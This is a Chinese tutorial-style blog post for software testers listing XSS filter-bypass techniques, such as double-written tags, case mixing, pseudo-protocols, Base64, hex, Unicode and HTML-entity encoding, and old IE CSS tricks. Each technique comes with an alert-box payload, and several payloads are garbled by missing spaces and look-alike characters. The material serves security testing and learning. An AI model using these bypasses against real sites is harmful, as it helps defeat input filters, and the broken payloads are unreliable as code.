[漏洞篇]XSS漏洞详解之绕过手段

📝 面试求职: 「面试试题小程序」 ,内容涵盖 测试基础、Linux操作系统、MySQL数据库、Web功能测试、接口测试、APPium移动端测试、Python知识、Selenium自动化测试相关、性能测试、性能测试、计算机网络知识、Jmeter、HR面试,命中率杠杠的。(大家刷起来…)

📝 职场经验干货:

软件测试工程师简历上如何编写个人信息(一周8个面试)

软件测试工程师简历上如何编写专业技能(一周8个面试)

软件测试工程师简历上如何编写项目经验(一周8个面试)

软件测试工程师简历上如何编写个人荣誉(一周8个面试)

软件测试行情分享(这些都不了解就别贸然冲了.)

软件测试面试重点,搞清楚这些轻松拿到年薪30W+

软件测试面试刷题小程序免费使用(永久使用)


前文我们对XSS的概念、危害、原理、分类进行了介绍,并对XSS的靶场搭建进行了实战演示,接下来为大家继续讲解XSS有哪些绕过手段。

绕过手段

1.前端过滤

有些防止XSS是通过前端js判断的,此时我们就可以BrupSuite抓包绕过或禁用js。

BrupSuite抓包改包绕过。

2.双写绕过

<scri<script>pt>alert(xss)</scri<script>pt>

3.事件过滤

替换其他事件,如:onclick,onmousemove事件

4.大小写绕过

<SCRIPT>aLeRT(111)</sCRIpt>

5.注释干扰绕过

如:

<scri<!–test–>pt>alert(xss);</scr<!–test–>ipt>

6.伪协议绕过

如:

 111"> <ahref= "javascript:alert(document.domain)">xss </a>
        < table background= "javascript:alert(/xss/)"> </table>
        <imgsrC= "javascript:alert('ss);" >

7.回车/空格/Tab绕过

// 回车
< img src= "jav
      ascript:
      alert('xss');" >
// 空格
<img src= "javascript:alert('xss');" >
// Tab
< img src= "javasc :ript:alert('ss');" >

8.编码绕过

Base64、JS编码、16进制、Unicode编码、HTML实体编码、URL编码

Base64编码绕过

如果过滤了<>’"script,可以用base64编码,eval(")eval函数把字符串当做程序执行atob函数是将base64密文转换为明文。

base64编码多用于如下两种情况:

<ahref=“可控点”>

<iframesrc=“可控点”>

举例:

<ahref=“data:text/html;base64,PGItZyBzcmM9eCBvbmVycm9yPWFsZXJOKDEpPg==”>test</a>

这样当testA链接点击时就会以data协议页面以html/text的方式解析编码为base64

然后单点击a链接时base64的编码就被还原成我们原本的

<imgsrc=xοnerrοr=alert(1)>

JS编码

八进制:三个八进制数字,如果个数不够,在前面补0,例如"e’的编码为"\145"

16进制编码​​​​​​​  

两个十六进制数字,如果个数不够,在前面补0,'e’的编码为"\x65"

十六进制前面加上\x可以被JS识别

尖括号被转义时,利用十六进制绕过

如:

\x3cscript\x3ealert(document.domain);\x3c/script\x3e

Unicode编码绕过

四个十六进制数字,如果个数不够,在前面补0,'e’的编码为"\u0065"

十六进制前面加上\u00变成JS可识别的Unicode编码

\u003cscript\u003ealert(document.domain);\u003c/script\u003e

HTML编码绕过 

字符编码:十进制、十六进制编码,样式为"&#数值;“,例如”<“可以编码为”<和"<"

<imgsrc="x"οnerrοr=“al&#101;r16;(1)”>

浏览器是不会在html|标签里解析js编码的,所以我们在οnerrοr=后面放js中的编码是不会解析你放进去是什么就是什么。HTML5新增的实体命名编码:

:=>[冒号]

=>[换行]

<ahref=“javascript:alert(1)”>click

URL编码

进行两次URL全编码

9.CSS绕过

IE特性绕过XSS

CSS特性绕过XSS

IE中利用CSS触发XSS

利用IE特性绕过XSS

IE中两个反单引号hgj``可以闭合一个左边双引号

``οnmοusemοve=alert(1)

CSS特性绕过XSS

设置background:url,利用JavaScript伪协议执行js,

目前只有IE浏览器支持

background-color:#f00;background:url(javascript:alert(document.domain);");

低版本IE浏览器610D版本弹窗成功

IE中利用CSS触发XSS

CSS中的注释//

xss:expres//sion(if(!window.x){alert(document.domain);window.x=1;})

最后: 下方这份完整的软件测试视频教程已经整理上传完成,需要的朋友们可以自行领取【保证100%免费】

​​

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值